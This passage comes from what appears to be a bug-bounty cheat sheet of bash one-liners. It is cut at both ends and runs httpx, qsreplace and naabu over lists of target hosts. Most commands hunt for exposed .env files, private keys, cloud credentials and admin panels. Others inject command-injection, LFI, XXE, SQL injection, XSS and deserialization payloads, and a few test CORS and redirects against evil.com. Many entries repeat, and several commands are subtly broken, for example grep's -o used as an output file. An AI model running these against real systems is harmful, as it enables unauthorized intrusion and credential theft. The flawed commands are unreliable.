Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt\n```\n\nπŸ—‚οΈ Directory Listing Enabled (Info Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path / -fr 'Index of /' -o dir_listing.txt\n```\n\nπŸ’‰ Command Injection via Input Parameters\n```bash\ncat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt\n```\n\nπŸͺ„ CORS Misconfiguration Check (Origin Reflection)\n```bash\ncat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'https://evil.com' -o cors_misconfig.txt\n```\n\nπŸ”— Open Redirect (URL Parameter Test)\n```bash\ncat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirect.txt\n```\n\nBackup/Old Files Exposure\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/index.php~\\n/config.old\\n/database.bak') -mc 200 -o exposed_backup_files.txt\n```\n\nπŸ•΅οΈ Clickjacking (Missing X-Frame-Options)\n```bash\ncat subdomains.txt | httpx -silent -hx -o headers.txt\ncat headers.txt | grep -E \"x-frame-options|X-Frame-Options\" -i -L \u003e clickjacking_vulnerable.txt\n```\n\nβš™οΈ Misconfigured Jenkins Instances\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o exposed_jenkins.txt\n```\n\nπŸ’Ύ Open MongoDB Instances (Cloud Exposure)\n```bash\ncat ips.txt | xargs -I{} sh -c 'echo {} \u0026\u0026 mongosh --host {} --eval \"db.stats()\"' 2\u003e/dev/null | tee open_mongodb.txt\n```\n\nExposed Private Keys (Accidental Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/id_rsa\\n/keys/privkey.pem\\n/.ssh/id_rsa') -mc 200 -o exposed_keys.txt\n```\n\nInsecure JSONP Endpoints (Callback Hijacking)\n```bash\ncat urls.txt | qsreplace 'callback=alert(document.domain)' | httpx -silent -fr 'alert(document.domain)' -o jsonp_vulns.txt\n```\n\nExposed phpinfo() Files (Info Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o exposed_phpinfo.txt\n```\n\nRCE via Deserialization (Java/PHP Payloads)\n```bash\ncat upload_urls.txt | xargs -I{} curl -X POST -F 'file=@payload.ser' {} -s | grep 'java.lang.Runtime' -o rce_found.txt\n```\n\nLFI via Log Files\n```bash\ncat urls.txt | qsreplace '../../../../../../../../var/log/nginx/access.log' | httpx -silent -fr 'GET /' -o log_lfi.txt\n```\n\nExposed Docker APIs (DevOps Misconfig)\n```bash\ncat ips.txt | xargs -I{} curl -s -X GET \"http://{}:2375/images/json\" | grep 'Id' -B 2 | tee exposed_docker.txt\n```\n\nAmazon S3 Buckets (Open Buckets)\n```bash\ncat subdomains.txt | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_s3_buckets.txt\n```\n\nOpen Elasticsearch (DevOps Exposure)\n```bash\ncat ips.txt | xargs -I{} curl -s \"http://{}:9200/_cat/indices?v\" | grep -v 'master' | tee open_elasticsearch.txt\n```\n\nBackup Files in Web Root\n```bash\ncat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 -o found_backups.txt\n```\n\nXSS in reflected parameters (quick check)\n```bash\ncat urls.txt | qsreplace '\u003cscript\u003ealert(1)\u003c/script\u003e' | httpx -silent -fr '\u003cscript\u003ealert(1)\u003c/script\u003e' -o xss_reflected.txt\n```\n\nSQL Injection (time-based detection)\n```bash\ncat urls.txt | qsreplace \"' AND SLEEP(5)--\" | httpx -silent -rt -o sqli_time_based.txt\n```\n\nDetect exposed Git repositories (.git folder)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o exposed_git_repos.txt\n```\n\nFind Local File Inclusion (LFI)\n```bash\ncat urls.txt | qsreplace '../../../../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_found.txt\n```\n\nOpen Directory Listing\n```bash\ncat subdomains.txt | httpx -silent -mc 200 -fr 'Index of' -o open_directory_listing.txt\n```\n\nFind Open Kibana Dashboards (Internal Leaks)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\nSubdomain Takeover (Check NXDOMAIN)\n```bash\nsubfinder -d target.com | httpx -silent -sc -o subs_status.txt\ncat subs_status.txt | grep 'NXDOMAIN' \u003e takeover_candidates.txt\n```\n\nTest for Host Header Injection\n```bash\ncat urls.txt | httpx -silent -H \"Host: evil.com\" -fr 'evil.com' -o host_header_injection.txt\n```\n\nExposed Config Files\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.php\\n/settings.py\\n/.env\\n/config.json') -mc 200 -o exposed_configs.txt\n```\n\nDetecting Exposed Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/wp-admin\\n/console\\n/dashboard') -mc 200 -o admin_panels.txt\n```\n\nCommand Injection Test\n```bash\ncat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt\n```\n\nCheck for Backup Files (Old Configs)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/db_backup.sql\\n/config.old') -mc 200 -o backup_files_found.txt\n```\n\nCheck for Open Redis Instances\n```bash\ncat subdomains.txt | httpx -silent -path / -p 6379 -o open_redis_instances.txt\n```\n\nTest for Open Proxy Misconfiguration\n```bash\ncurl -x http://target.com http://example.com -v\n```\n\nXXE Injection Test\n```bash\ncat urls.txt | qsreplace '\u003c?xml version=\"1.0\"?\u003e\u003c!DOCTYPE foo [\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e' | httpx -silent -fr 'root:x:' -o xxe_found.txt\n```\n\nDetect JWT Tokens in Response\n```bash\ncat urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt\n```\n\nServer Version Disclosure (Fingerprinting)\n```bash\ncat subdomains.txt | httpx -silent -server -o server_versions.txt\n```\n\nTest PUT Method for File Upload\n```bash\ncat subdomains.txt | httpx -silent -method PUT -path '/test.txt' -body 'test upload' -mc 201,200 -o put_upload_possible.txt\n```\n\nCheck for Debug Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path /debug -mc 200 -o debug_endpoints.txt\n```\n\nFind Content Security Policy Bypass (Open Wildcards)\n```bash\ncat subdomains.txt | httpx -silent -hx | grep 'Content-Security-Policy' | grep '*'\n```\n\nCheck for Public .DS_Store Files (Directory Listing)\n```bash\ncat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_leaks.txt\n```\n\nFind Open Jenkins Panels\n```bash\ncat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt\n```\n\nDetect Internal IP Leaks in Response\n```bash\ncat urls.txt | httpx -silent -fr '10.' -o internal_ip_leak.txt\n```\n\nSearch for Open API Documentation (Swagger)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/swagger-ui.html\\n/api-docs\\n/openapi.json') -mc 200 -o open_api_docs.txt\n```\n\nFind Exposed .env Files (Sensitive Configs)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt\n```\n\nDetect Exposed MySQL Dumps\n```bash\ncat subdomains.txt | httpx -silent -path /db.sql -mc 200 -o mysql_dumps.txt\n```\n\nCheck for Misconfigured CORS (Allow-All)\n```bash\ncat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt\n```\n\nFind Exposed Adminer (DB Management Interface)\n```bash\ncat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o exposed_adminer.txt\n```\n\nSearch for Exposed Backup Files (.bak)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/index.php.bak\\n/config.bak\\n/db.bak') -mc 200 -o backup_files.txt\n```\n\nSearch for Test/Dev Subdomains (Staging)\n```bash\nsubfinder -d target.com | grep -Ei 'dev|test|staging|qa' \u003e staging_subdomains.txt\n```\n\nDetect Open RDP Servers (Network Exposures)\n```bash\ncat ips.txt | naabu -p 3389 -silent -o open_rdp.txt\n```\n\nDetect AWS S3 Buckets via Subdomains\n```bash\ncat subdomains.txt | grep -E 's3.amazonaws.com|amazonaws' \u003e s3_buckets.txt\n```\n\nIdentify Weak Security Headers (Lack of CSP, HSTS)\n```bash\ncat urls.txt | httpx -silent -hx | grep -v -E 'Strict-Transport-Security|Content-Security-Policy' \u003e weak_headers.txt\n```\n\nCheck for Exposed Docker API\n```bash\ncat ips.txt | naabu -p 2375 -silent -o open_docker_api.txt\n```\n\nFind Open Grafana Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt\n```\n\nCheck for Public PHP Info Pages (Leaking Config)\n```bash\ncat urls.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nFind Exposed Laravel Debug Panels\n```bash\ncat subdomains.txt | httpx -silent -path /_debugbar -mc 200 -o laravel_debug.txt\n```\n\nLook for Open ElasticSearch (Data Exposure)\n```bash\ncat ips.txt | naabu -p 9200 -silent -o open_elasticsearch.txt\n```\n\nIdentify Directory Traversal (Simple Payload)\n```bash\ncat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o directory_traversal.txt\n```\n\nFind Open Kibana Dashboards (Sensitive Logs)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\nDetect Exposed Wordpress Debug Logs\n```bash\ncat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_logs.txt\n```\n\nFind Exposed FTP Servers (Anonymous Access)\n```bash\ncat ips.txt | naabu -p 21 -silent -o open_ftp.txt\n```\n\nDetect Open MongoDB Databases (No Auth)\n```bash\ncat ips.txt | naabu -p 27017 -silent -o open_mongo.txt\n```\n\nIdentify Open PhpMyAdmin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o open_phpmyadmin.txt\n```\n\nSearch for Backup Files with Extensions (.bak, .old)\n```bash\ncat subdomains.txt | gauplus | grep -E '\\.bak|\\.old|\\.backup' \u003e backup_files_found.txt\n```\n\nCheck for Open Directories (Index of Listings)\n```bash\ncat subdomains.txt | httpx -silent -mc 200 -fr 'Index of /' -o open_directories.txt\n```\n\nFind Public GraphQL Endpoints (API Leaks)\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -o open_graphql.txt\n```\n\nIdentify Misconfigured AWS Bucket via Headers\n```bash\ncat urls.txt | httpx -silent -hx | grep -i 'x-amz' \u003e aws_bucket_leaks.txt\n```\n\nCheck for Publicly Accessible Jenkins Script Console\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt\n```\n\nCheck for Exposed SVN Files\n```bash\ncat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_leaks.txt\n```\n\nFind Publicly Exposed Config.json Files\n```bash\ncat subdomains.txt | httpx -silent -path /config.json -mc 200 -o config_json_exposed.txt\n```\n\nIdentify Unauthenticated Redis Servers\n```bash\ncat ips.txt | naabu -p 6379 -silent -o open_redis.txt\n```\n\nDetect Exposed Private Keys in URLs\n```bash\ncat urls.txt | grep -Ei 'private_key|id_rsa|pem' \u003e private_key_leaks.txt\n```\n\nSearch for Open API Keys in URLs\n```bash\ncat urls.txt | grep -Ei 'apikey|api_key|token' \u003e exposed_api_keys.txt\n```\n\nDetect Exposed .bash_history Files\n```bash\ncat subdomains.txt | httpx -silent -path /.bash_history -mc 200 -o bash_history_exposed.txt\n```\n\nCheck for Open etc/passwd via LFI\n```bash\ncat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_passwd.txt\n```\n\nFind Open Exposed Backup ZIP Files\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/site_backup.zip\\n/db_backup.zip') -mc 200 -o backup_zip_exposed.txt\n```\n\nDetect Exposed Logs (server.log, error.log)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/server.log\\n/error.log\\n/application.log') -mc 200 -o exposed_logs.txt\n```\n\nFind Publicly Accessible Admin Panels (General)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/administrator\\n/admin/login\\n/admin.php\\n/adminer.php') -mc 200 -o open_admin_panels.txt\n```\n\nDetect Exposed YAML Config Files\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.yaml\\n/application.yaml') -mc 200 -o exposed_yaml.txt\n```\n\nCheck for Directory Traversal to Windows Files\n```bash\ncat urls.txt | qsreplace 'C:\\Windows\\win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_lfi.txt\n```\n\nFind Open Jupyter Notebooks (No Auth)\n```bash\ncat subdomains.txt | httpx -silent -path /tree -mc 200 -o open_jupyter.txt\n```\n\nIdentify Server Error Pages (500 Errors)\n```bash\ncat urls.txt | httpx -silent -mc 500 -o server_errors.txt\n```\n\nCheck for Open SNMP Services\n```bash\ncat ips.txt | naabu -p 161 -silent -o open_snmp.txt\n```\n\nFind Exposed Laravel Environment Files (.env)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt\n```\n\nDetect Git Repository Exposures (.git/config)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_configs.txt\n```\n\nLook for Exposed Dockerfiles\n```bash\ncat subdomains.txt | httpx -silent -path /Dockerfile -mc 200 -o exposed_dockerfiles.txt\n```\n\nIdentify Publicly Accessible AWS Credentials\n```bash\ncat subdomains.txt | httpx -silent -path /aws/credentials -mc 200 -o exposed_aws_credentials.txt\n```\n\nSearch for Backup Database Dumps (SQL, SQLite)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/db.sql\\n/database.sql\\n/dump.sql\\n/backup.db') -mc 200 -o db_dumps.txt\n```\n\nDetect Exposed SSL Certificates (pem)\n```bash\ncat subdomains.txt | httpx -silent -path /ssl/cert.pem -mc 200 -o exposed_ssl.txt\n```\n\nFind Open Configuration.php Files (Joomla)\n```bash\ncat subdomains.txt | httpx -silent -path /configuration.php -mc 200 -o joomla_config_exposed.txt\n```\n\nHunt for Open Jenkins Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt\n```\n\nDetect Exposed Magento Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /admin -mc 200 -o magento_admin.txt\n```\n\nCheck for Exposed API Documentation (Swagger UI)\n```bash\ncat subdomains.txt | httpx -silent -path /swagger-ui.html -mc 200 -o swagger_exposed.txt\n```\n\nDetect GitLab or GitHub Enterprise Instances\n```bash\ncat subdomains.txt | httpx -silent -path /users/sign_in -mc 200 -o gitlab_or_ghe.txt\n```\n\nFind Misconfigured CORS (Wildcard)\n```bash\ncat urls.txt | httpx -silent -H \"Origin: https://evil.com\" -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt\n```\n\nScan for Server Status Pages (Apache/Nginx)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/server-status\\n/nginx_status') -mc 200 -o server_status_exposed.txt\n```\n\nIdentify Exposed Debug Pages (PHP Info)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nDetect Open Redis Stats Pages (Unprotected UI)\n```bash\ncat subdomains.txt | httpx -silent -path /redis -mc 200 -o redis_ui_exposed.txt\n```\n\nScan for Exposed Kubernetes Dashboard\n```bash\ncat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt\n```\n\nLook for GraphQL Playground\n```bash\ncat subdomains.txt | httpx -silent -path /playground -mc 200 -o graphql_playground_exposed.txt\n```\n\nFind Exposed OpenAPI Spec Files (openapi.json)\n```bash\ncat subdomains.txt | httpx -silent -path /openapi.json -mc 200 -o openapi_exposed.txt\n```\n\nScan for Exposed GCP Metadata Servers\n```bash\ncat ips.txt | naabu -p 80,443 -silent | httpx -path /computeMetadata/v1/ -H 'Metadata-Flavor: Google' -mc 200 -o gcp_metadata_exposed.txt\n```\n\nFind Exposed Jenkins Console Logs\n```bash\ncat subdomains.txt | httpx -silent -path /console -mc 200 -o jenkins_console_logs.txt\n```\n\nCheck for Open Jira Dashboards (Exposed Tickets)\n```bash\ncat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_exposed.txt\n```\n\nDetect Exposed Env Variables via /env (SpringBoot)\n```bash\ncat subdomains.txt | httpx -silent -path /env -mc 200 -o springboot_env_exposed.txt\n```\n\nFind Misconfigured GitHub Actions Workflows (YAML)\n```bash\ncat subdomains.txt | gauplus | grep -Ei '.github/workflows/.*\\.yml' \u003e github_workflows_exposed.txt\n```\n\nScan for Default Admin Credentials on Login Pages\n```bash\ncat urls.txt | nuclei -t cves/ -tags 'default-login' -o default_creds.txt\n```\n\nCheck for Misconfigured Prometheus Servers\n```bash\ncat subdomains.txt | httpx -silent -path /graph -mc 200 -o prometheus_exposed.txt\n```\n\nFind Exposed Backup Files (ZIP, TAR, SQL)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/backup.tar.gz\\n/dump.sql') -mc 200 -o exposed_backups.txt\n```\n\nDetect Exposed Open Directory Listings\n```bash\ncat subdomains.txt | httpx -silent -fr '\u003ctitle\u003eIndex of /' -o open_directories.txt\n```\n\nFind Open Jenkins Script Console (RCE Point)\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt\n```\n\nScan for Exposed Kubernetes Kubelet APIs (Unauth Access)\n```bash\ncat ips.txt | httpx -silent -path /pods -mc 200 -o kubelet_exposed.txt\n```\n\nLook for Apache Struts Vulnerable Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path /struts2-showcase/index.action -mc 200 -o struts_vuln.txt\n```\n\nIdentify Open Tomcat Manager Consoles\n```bash\ncat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_manager_open.txt\n```\n\nDetect CVE-2021-3129 (Laravel Debug Mode RCE)\n```bash\ncat subdomains.txt | httpx -silent -path /_ignition/execute-solution -mc 200 -o laravel_rce.txt\n```\n\nFind Exposed Config.json / settings.json\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.json\\n/settings.json') -mc 200 -o exposed_json_configs.txt\n```\n\nCheck for Outdated WordPress (Version Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_version.txt\n```\n\nFind Exposed Log Files (.log)\n```bash\ncat subdomains.txt | httpx -silent -path /error.log -mc 200 -o exposed_logs.txt\n```\n\nDetect Misconfigured GraphQL Endpoints (Introspection Enabled)\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -H 'Content-Type: application/json' -d '{\"query\":\"query IntrospectionQuery {__schema { queryType { name }}}\"}' -o graphql_introspection_enabled.txt\n```\n\nScan for Exposed Config.php in WordPress / Joomla\n```bash\ncat subdomains.txt | httpx -silent -path /wp-config.php -mc 200 -o wp_config_exposed.txt\n```\n\nDetect Open API Endpoints (via common paths)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/api/v1/\\n/api/\\n/api/v2/\\n/app_dev.php/api/') -mc 200 -o open_api_endpoints.txt\n```\n\nCheck for Exposed GitHub Personal Access Tokens (PATs)\n```bash\ncat subdomains.txt | gauplus | grep -E 'token=[a-z0-9]+' \u003e github_tokens_leak.txt\n```\n\nFind Misconfigured AWS Buckets (S3)\n```bash\ncat subdomains.txt | httpx -silent -path / -mc 200 -o s3_buckets_exposed.txt\n```\n\nScan for Exposed Laravel Log Files\n```bash\ncat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o laravel_log_exposed.txt\n```\n\nCheck for Outdated Apache Version via Server Header\n```bash\ncat subdomains.txt | httpx -silent -fr 'Server: Apache/2.4' -o outdated_apache.txt\n```\n\nDetect PHPMyAdmin Open Login Pages\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_open.txt\n```\n\nLook for Unprotected Kibana Instances\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_open.txt\n```\n\nScan for Public Grafana Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /login -mc 200 -o grafana_login_open.txt\n```\n\nSearch for Common Backup Extensions (bak, old, save)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/index.php.bak\\n/config.old\\n/config.save') -mc 200 -o backup_files_exposed.txt\n```\n\nFind Misconfigured ElasticSearch Instances (Public Index)\n```bash\ncat ips.txt | httpx -silent -path /_cat/indices?v -mc 200 -o elasticsearch_exposed.txt\n```\n\nLook for Exposed Jenkins Build Logs\n```bash\ncat subdomains.txt | httpx -silent -path /job/test/lastBuild/consoleText -mc 200 -o jenkins_build_logs.txt\n```\n\nFind Open Adminer DB Management Tools\n```bash\ncat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt\n```\n\nDetect Exposed SVN Directories\n```bash\ncat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_exposed.txt\n```\n\nDetect Exposed .git Repos (Source Code Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_exposed.txt\n```\n\nFind Sensitive Files using common patterns (env, db creds, ssh keys)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/database.yml\\n/id_rsa\\n/config.php\\n/secrets.yml') -mc 200 -o sensitive_files.txt\n```\n\nDetect Exposed Docker and Kubernetes Dashboard\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy\\n/docker') -mc 200 -o kube_docker_exposed.txt\n```\n\nScan for Exposed Environment Variables in Responses\n```bash\ncat subdomains.txt | httpx -silent -fr 'AWS_ACCESS_KEY_ID|SECRET_KEY|DB_PASSWORD' -o secrets_in_response.txt\n```\n\nFind Public Swagger API Documentation (API Discovery)\n```bash\ncat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt\n```\n\nCheck for Exposed Server-Status Pages (Apache/Nginx Debug Info)\n```bash\ncat subdomains.txt | httpx -silent -path /server-status -mc 200 -o server_status_exposed.txt\n```\n\nScan for Open Redis, Memcached, MongoDB Ports (Unauth Access)\n```bash\nnaabu -list subdomains.txt -ports 6379,11211,27017 -silent -o open_db_ports.txt\n```\n\nIdentify Publicly Accessible .DS_Store (File Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt\n```\n\nFind Exposed Wordpress Debug Log (Sensitive Info)\n```bash\ncat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_log.txt\n```\n\nCheck for Exposed Internal IP in Responses (SSR Leak)\n```bash\ncat subdomains.txt | httpx -silent -fr '10\\.|192\\.168\\.|172\\.' -o internal_ip_leak.txt\n```\n\nFind Laravel Env Leak via Incorrect Env Handler\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o laravel_env_leak.txt\n```\n\nScan for Exposed Backup Folders\n```bash\ncat subdomains.txt | httpx -silent -path /backup -mc 200 -o backup_folder_exposed.txt\n```\n\nLook for Open Joomla Installers\n```bash\ncat subdomains.txt | httpx -silent -path /installation/index.php -mc 200 -o joomla_installer.txt\n```\n\nDetect Exposed Debug Pages (debug=true)\n```bash\ncat subdomains.txt | httpx -silent -fr 'debug=true' -o debug_pages.txt\n```\n\nFind Open Jira Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_open.txt\n```\n\nScan for Exposed Backup Files (config.old, index.bak)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.old\\n/index.bak\\n/wp-config.php.save') -mc 200 -o backup_leaks.txt\n```\n\nDetect Open Admin Portals (Common Paths)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/login\\n/dashboard\\n/console') -mc 200 -o open_admin_portals.txt\n```\n\nFind Exposed Debug Toolbar (Django Debug)\n```bash\ncat subdomains.txt | httpx -silent -path /__debug__/ -mc 200 -o django_debug_toolbar.txt\n```\n\nDetect Open Directories with Readable Files\n```bash\ncat subdomains.txt | httpx -silent -fr '\u003ctitle\u003eIndex of /' -o open_directory_listing.txt\n```\n\nIdentify Exposed Proxy Logs (Squid / HAProxy)\n```bash\ncat subdomains.txt | httpx -silent -path /var/log/squid/access.log -mc 200 -o proxy_logs_exposed.txt\n```\n\nCheck for Public WebSockets Endpoints (Leaky API)\n```bash\ncat subdomains.txt | httpx -silent -path /socket.io -mc 200 -o websocket_exposed.txt\n```\n\nFind Public GraphQL Consoles (Interactive API)\n```bash\ncat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphiql_open.txt\n```\n\nScan for Open Hadoop Resource Manager\n```bash\ncat subdomains.txt | httpx -silent -path /ws/v1/cluster/info -mc 200 -o hadoop_exposed.txt\n```\n\nDetect Exposed PHPInfo Pages (Info Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nFind Publicly Accessible Wordpress XMLRPC (Brute Force Possible)\n```bash\ncat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_open.txt\n```\n\nDetect Open ElasticSearch Instances (Data Exposure)\n```bash\nnaabu -list subdomains.txt -p 9200 -silent | httpx -silent -path /_cat/indices?v -mc 200 -o open_elasticsearch.txt\n```\n\nScan for Open Kubernetes Config (Cluster Info Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.kube/config -mc 200 -o kube_config_exposed.txt\n```\n\nFind GraphQL Endpoints with Introspection Enabled\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -fr 'Introspection' -o graphql_introspection.txt\n```\n\nDetect Misconfigured CORS (Allow-Origin: )\n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr 'Access-Control-Allow-Origin: \\*' -o cors_misconfig.txt\n```\n\nLook for Exposed Adminer (DB Management Tool)\n```bash\ncat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt\n```\n\nDetect Open Redis Commander UI (Unauth Control)\n```bash\ncat subdomains.txt | httpx -silent -path /redis/ -mc 200 -o redis_ui_exposed.txt\n```\n\nFind Public GitLab CI/CD Config (Pipeline Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt\n```\n\nScan for Open Debug Mode in Flask Apps\n```bash\ncat subdomains.txt | httpx -silent -path /console -mc 200 -o flask_debug_console.txt\n```\n\nDetect Open Exim/Webmin Panels\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/exim\\n/webmin') -mc 200 -o open_exim_webmin.txt\n```\n\nFind Exposed Laravel Log Files (App Key Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o laravel_logs_exposed.txt\n```\n\nDetect Public AWS Config Files (Credentials Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.aws/credentials -mc 200 -o aws_creds_exposed.txt\n```\n\nIdentify Open Favicon Files and Fingerprint Services\n```bash\ncat subdomains.txt | httpx -silent -path /favicon.ico -o favicons/ \u0026\u0026 for icon in favicons/*; do shasum -a 256 $icon; done\n```\n\nCheck for Exposed GitHub Workflow Files (.github/workflows)\n```bash\ncat subdomains.txt | httpx -silent -path /.github/workflows/ -mc 200 -o github_workflows_exposed.txt\n```\n\nFind Jenkins Consoles with Anon Access\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_console.txt\n```\n\nScan for Default Tomcat Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_admin_exposed.txt\n```\n\nLook for Public Backup Files (tar/zip dumps)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/backup.tar.gz\\n/db.sql') -mc 200 -o exposed_backups.txt\n```\n\nCheck for Exposed Laravel Telescope Panels\n```bash\ncat subdomains.txt | httpx -silent -path /telescope -mc 200 -o laravel_telescope.txt\n```\n\nFind Exposed VNC/TeamViewer/Web RDP\n```bash\nnaabu -list subdomains.txt -p 5900,3389 -silent -o remote_access_ports.txt\n```\n\nDetect Open Grafana Panels (Unauth Access)\n```bash\ncat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt\n```\n\nScan for Misconfigured API Endpoints\n```bash\ncat subdomains.txt | nuclei -t misconfiguration/api-misconfiguration.yaml -o api_misconfigs.txt\n```\n\nIdentify Exposed Internal DNS Resolvers\n```bash\ncat subdomains.txt | dnsx -a -resp-only -silent | grep -E '10\\.|192\\.168\\.|172\\.' -o internal_dns.txt\n```\n\nDetect Anonymous FTP Access (File Exposure)\n```bash\nnmap -p 21 --script ftp-anon -iL subdomains.txt -oN ftp_anon_scan.txt\n```\n\nFind Exposed Configuration Pages (config.php)\n```bash\ncat subdomains.txt | httpx -silent -path /config.php -mc 200 -o config_php_exposed.txt\n```\n\nIdentify Publicly Available Magento Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /admin -mc 200 -fr 'Magento' -o 